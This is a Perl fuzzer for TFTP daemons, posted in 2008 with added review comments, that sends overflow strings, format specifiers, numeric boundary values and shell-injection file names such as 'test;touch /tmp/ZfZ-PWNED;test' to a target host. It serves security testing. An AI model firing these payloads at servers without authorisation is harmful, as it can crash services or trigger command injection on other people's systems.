
tftpfuzz.txt

tftpfuzz.txt
Posted Oct 30, 2008
Authored by Jeremy Brown | Site jbrownsec.blogspot.com

TFTP daemon fuzzer that uses Net::TFTP.

tags | fuzzer
SHA-256 | f0bb5b52d7d08ec8d250d4dc352452c02c79c428856b9235545fcf7730463f97

#!/usr/bin/perl
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# TFTP Daemon Fuzzer.. remember to cpan Net::TFTP
# Wrote this up in about 10 minutes .. Bug on.

use Net::TFTP;
use Getopt::Std;

# Payload tables. Every entry is a plain string that the stages below place
# into one field of a TFTP request (the mode option or a file name).

# Long runs of 'A', from 600 up to 12,000,000 characters.
# NOTE(review): TFTP runs over UDP, so entries longer than the maximum UDP
# payload (about 64 KB) presumably cannot leave the client as a single request
# datagram -- TODO confirm how Net::TFTP handles them.
# NOTE(review): in a Perl double-quoted string "\0x99" is a NUL byte followed
# by the literal text "x99", not the single byte 0x99; "\x99" was likely
# intended. The last entry is therefore 1200 repeats of that 4-byte sequence.
@overflow = ('A' x 600, 'A' x 1200, 'A' x 2200, 'A' x 4200, 'A' x 8200, 'A' x 11000,
'A' x 22000, 'A' x 52000, 'A' x 110000, 'A' x 550000, 'A' x 1100000,
'A' x 2200000, 'A' x 5500000, 'A' x 12000000, "\0x99" x 1200);

# printf-style conversion specifiers, for spotting code that passes request
# fields to a format function as the format string.
# NOTE(review): "\0xCD" and "\0xCB" have the same escape problem as "\0x99"
# above: each is NUL + "xCD" / "xCB", not a single high byte.
@fmtstring = ("%n%n%n%n%n", "%p%p%p%p%p", "%s%s%s%s%s", "%d%d%d%d%d", "%x%x%x%x%x",
"%s%p%x%d", "%.1024d", "%.1025d", "%.2048d", "%.2049d", "%.4096d", "%.4097d",
"%99999999999s", "%08x", "%%20n", "%%20p", "%%20s", "%%20d", "%%20x",
"%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%",
"%n%n%n%n%n%n%n%n%n%n%p%p%p%p%p%p%p%p%p%p%x%x%x%x%x%x%x%x%x%x%d%d%d%d%d%d%d%d%d%d%s%s%s%s%s%s%s%s%s%s",
"\0xCD" x 50, "\0xCB" x 50);

# Numeric boundary values written as strings: on and next to the 16-bit and
# 32-bit signed/unsigned limits, very large and very small floating-point
# literals, and hexadecimal spellings of similar limits.
@numbers = ("0", "-0", "1", "-1", "32767", "-32768", "2147483647", "-2147483647", "2147483648", "-2147483648",
"4294967294", "4294967295", "4294967296", "357913942", "-357913942", "536870912", "-536870912",
"1.79769313486231E+308", "3.39519326559384E-313", "99999999999", "-99999999999", "0x100", "0x1000",
"0x3fffffff", "0x7ffffffe", "0x7fffffff", "0x80000000", "0xffff", "0xfffffffe", "0xfffffff", "0xffffffff",
"0x10000", "0x100000", "0x99999999", "65535", "65536", "65537", "16777215", "16777216", "16777217", "-268435455");

# Punctuation, path separators and shell-metacharacter strings. The shell
# entries wrap "touch /tmp/ZfZ-PWNED" or a calc.exe path, so the appearance of
# /tmp/ZfZ-PWNED (or a calc.exe process) on the host running the daemon is the
# observable sign that a request field reached a command interpreter.
# NOTE(review): the first entry is double-quoted, so "$%" is interpolated as
# Perl's special variable $% rather than sent literally; single quotes would
# keep the text as written.
@miscbugs = ("~!@#$%^&*()-=_+", "[]\{}|;:,./<>?\\", "<<<<<<<<<<>>>>>>>>>>", "\\\\\\\\\\//////////", "^^^^^^^^^^^^^^^^^^^^",
"||||||||||~~~~~~~~~~", "?????[[[[[]]]]]{{{{{}}}}}((())", "test|touch /tmp/ZfZ-PWNED|test", "test`touch /tmp/ZfZ-PWNED`test",
"test'touch /tmp/ZfZ-PWNED'test", "test;touch /tmp/ZfZ-PWNED;test", "test&&touch /tmp/ZfZ-PWNED&&test", "test|C:/WINDOWS/system32/calc.exe|test",
"test`C:/WINDOWS/system32/calc.exe`test", "test'C:/WINDOWS/system32/calc.exe'test", "test;C:/WINDOWS/system32/calc.exe;test",
"/bin/sh", "C:/WINDOWS/system32/calc.exe", "¶§¼½¿", "%0xa", "%u000", "/" x 200, "\\" x 200, "-----99999-----", "[[[abc123]]]", "|||/////|||");

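# Command line: a single option, -h <host>, naming the TFTP server to test.
# The value is stored in the global $host, which every stage below reads.
getopts('h:', \%opts);
$host = $opts{'h'};

# Without -h there is nothing to test: print the usage banner and stop.
# The exit status stays 0, as before.
unless (defined $host) {
    print "\n TFTP - TFTP Server Fuzzer";
    # The "@" is escaped: unescaped, "@gmail" inside a double-quoted string is
    # interpolated as the (empty) array @gmail and drops out of the output.
    print "\nJeremy Brown [0xjbrown41\@gmail.com/http://jbrownsec.blogspot.com]";
    print "\n Usage: $0 -h <host>\n\n";
    exit(0);
}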

# Stage "MODE/GET": each payload list is walked in turn and every payload is
# passed to Net::TFTP->new as the Mode option, followed by a read request for
# the remote file "test" (second argument "test" is the local file name, so
# ./test in the working directory may be overwritten).
# NOTE(review): the banner says COMPLETE but is printed before the stage runs.
# NOTE(review): binary() is called after new(); Net::TFTP's binary() appears
# to set the transfer mode to "octet", which would replace the payload stored
# in Mode -- confirm against the installed module before counting this stage
# as coverage of the mode field.
# The result of get() is never checked, so this stage cannot tell whether the
# daemon answered, refused, or stopped responding.
print "\nFuzzing [TFTP]->[MODE/GET] STAGE #1 COMPLETE...";
for my $payload_set (\@overflow, \@fmtstring, \@numbers, \@miscbugs) {
    for my $payload (@{$payload_set}) {
        my $client = Net::TFTP->new($host, Mode => $payload);
        $client->binary;
        $client->get("test", "test");
    }
    # One-second pause after each payload list.
    sleep(1);
}

# Stage "MODE/PUT": same payload walk as the MODE/GET stage, but each request
# is a write. put("test", "test") names a local file "test" to send and the
# remote name "test".
# NOTE(review): presumably ./test must exist and be readable for put() to send
# anything; the result is not checked, so a missing file fails silently.
# NOTE(review): binary() after new() appears to reset the mode to "octet",
# which would discard the payload passed as Mode -- confirm against the
# installed Net::TFTP.
# NOTE(review): the banner says COMPLETE but is printed before the stage runs.
print "\nFuzzing [TFTP]->[MODE/PUT] STAGE #2 COMPLETE...";
for my $payload_set (\@overflow, \@fmtstring, \@numbers, \@miscbugs) {
    for my $payload (@{$payload_set}) {
        my $client = Net::TFTP->new($host, Mode => $payload);
        $client->binary;
        $client->put("test", "test");
    }
    # One-second pause after each payload list.
    sleep(1);
}

# Stage "GET/ASCII/NETASCII": the payload is used as the remote file name of a
# read request. The client is built with default options and ascii() is
# called before the request; anything received is written to local ./test.
# The result of get() is not checked, so failures and timeouts are silent.
# NOTE(review): the banner says COMPLETE but is printed before the stage runs.
print "\nFuzzing [TFTP]->[GET/ASCII/NETASCII] STAGE #1 COMPLETE...";
for my $payload_set (\@overflow, \@fmtstring, \@numbers, \@miscbugs) {
    for my $remote_name (@{$payload_set}) {
        my $client = Net::TFTP->new($host);
        $client->ascii;
        $client->get($remote_name, "test");
    }
    # One-second pause after each payload list.
    sleep(1);
}

# Stage "GET/ASCII/OCTET": the payload is the remote file name of a read
# request; the client is created with Mode => "octet" and then ascii() is
# called. Anything received is written to local ./test.
# NOTE(review): ascii() runs after the constructor, so it presumably replaces
# the "octet" mode with netascii, making this stage equivalent on the wire to
# the GET/ASCII/NETASCII one -- confirm against the installed Net::TFTP.
# The result of get() is not checked.
print "\nFuzzing [TFTP]->[GET/ASCII/OCTET] STAGE #2 COMPLETE...";
for my $payload_set (\@overflow, \@fmtstring, \@numbers, \@miscbugs) {
    for my $remote_name (@{$payload_set}) {
        my $client = Net::TFTP->new($host, Mode => "octet");
        $client->ascii;
        $client->get($remote_name, "test");
    }
    # One-second pause after each payload list.
    sleep(1);
}

# Stage "GET/BINARY/NETASCII": the payload is the remote file name of a read
# request; the client is created with default options and binary() is called
# before the request. Anything received is written to local ./test.
# NOTE(review): binary() presumably selects octet mode, so the NETASCII part
# of the banner may not describe what is sent -- confirm.
# The result of get() is not checked.
print "\nFuzzing [TFTP]->[GET/BINARY/NETASCII] STAGE #3 COMPLETE...";
for my $payload_set (\@overflow, \@fmtstring, \@numbers, \@miscbugs) {
    for my $remote_name (@{$payload_set}) {
        my $client = Net::TFTP->new($host);
        $client->binary;
        $client->get($remote_name, "test");
    }
    # One-second pause after each payload list.
    sleep(1);
}

# Stage "GET/BINARY/OCTET": the payload is the remote file name of a read
# request; the client is created with Mode => "octet" and binary() is called
# before the request. Anything received is written to local ./test.
# The result of get() is not checked, so an unresponsive daemon is not
# detected by this script.
# NOTE(review): the banner says COMPLETE but is printed before the stage runs.
print "\nFuzzing [TFTP]->[GET/BINARY/OCTET] STAGE #4 COMPLETE...";
for my $payload_set (\@overflow, \@fmtstring, \@numbers, \@miscbugs) {
    for my $remote_name (@{$payload_set}) {
        my $client = Net::TFTP->new($host, Mode => "octet");
        $client->binary;
        $client->get($remote_name, "test");
    }
    # One-second pause after each payload list.
    sleep(1);
}

# Stage "PUT/ASCII/NETASCII": write requests in which the payload is the
# remote file name; the data sent comes from the local file "test". The
# client uses default options with ascii() called before the request.
# NOTE(review): presumably ./test must exist and be readable for put() to send
# anything; the result is not checked, so a missing file fails silently.
# NOTE(review): the banner says COMPLETE but is printed before the stage runs.
print "\n\nFuzzing [TFTP]->[PUT/ASCII/NETASCII] STAGE #1 COMPLETE...";
for my $payload_set (\@overflow, \@fmtstring, \@numbers, \@miscbugs) {
    for my $remote_name (@{$payload_set}) {
        my $client = Net::TFTP->new($host);
        $client->ascii;
        $client->put("test", $remote_name);
    }
    # One-second pause after each payload list.
    sleep(1);
}

# Stage "PUT/ASCII/OCTET": write requests with the payload as the remote file
# name and local file "test" as the data source; the client is created with
# Mode => "octet" and then ascii() is called.
# NOTE(review): ascii() runs after the constructor, so it presumably replaces
# the "octet" mode with netascii -- confirm against the installed Net::TFTP.
# NOTE(review): presumably ./test must exist locally; put() results are not
# checked.
print "\nFuzzing [TFTP]->[PUT/ASCII/OCTET] STAGE #2 COMPLETE...";
for my $payload_set (\@overflow, \@fmtstring, \@numbers, \@miscbugs) {
    for my $remote_name (@{$payload_set}) {
        my $client = Net::TFTP->new($host, Mode => "octet");
        $client->ascii;
        $client->put("test", $remote_name);
    }
    # One-second pause after each payload list.
    sleep(1);
}

# Stage "PUT/BINARY/NETASCII": write requests with the payload as the remote
# file name and local file "test" as the data source; the client uses default
# options with binary() called before the request.
# NOTE(review): binary() presumably selects octet mode, so the NETASCII part
# of the banner may not describe what is sent -- confirm.
# NOTE(review): presumably ./test must exist locally; put() results are not
# checked.
print "\nFuzzing [TFTP]->[PUT/BINARY/NETASCII] STAGE #3 COMPLETE...";
for my $payload_set (\@overflow, \@fmtstring, \@numbers, \@miscbugs) {
    for my $remote_name (@{$payload_set}) {
        my $client = Net::TFTP->new($host);
        $client->binary;
        $client->put("test", $remote_name);
    }
    # One-second pause after each payload list.
    sleep(1);
}

# Final stage, "PUT/BINARY/OCTET": write requests with the payload as the
# remote file name and local file "test" as the data source; the client is
# created with Mode => "octet" and binary() is called before the request.
# NOTE(review): presumably ./test must exist locally; put() results are not
# checked, so the script ends without reporting which requests, if any, the
# daemon failed to handle. Daemon health has to be observed separately.
# NOTE(review): the banner says COMPLETE but is printed before the stage runs.
print "\nFuzzing [TFTP]->[PUT/BINARY/OCTET] STAGE #4 COMPLETE...\n\n";
for my $payload_set (\@overflow, \@fmtstring, \@numbers, \@miscbugs) {
    for my $remote_name (@{$payload_set}) {
        my $client = Net::TFTP->new($host, Mode => "octet");
        $client->binary;
        $client->put("test", $remote_name);
    }
    # One-second pause after each payload list.
    sleep(1);
}

# All stages done.
exit;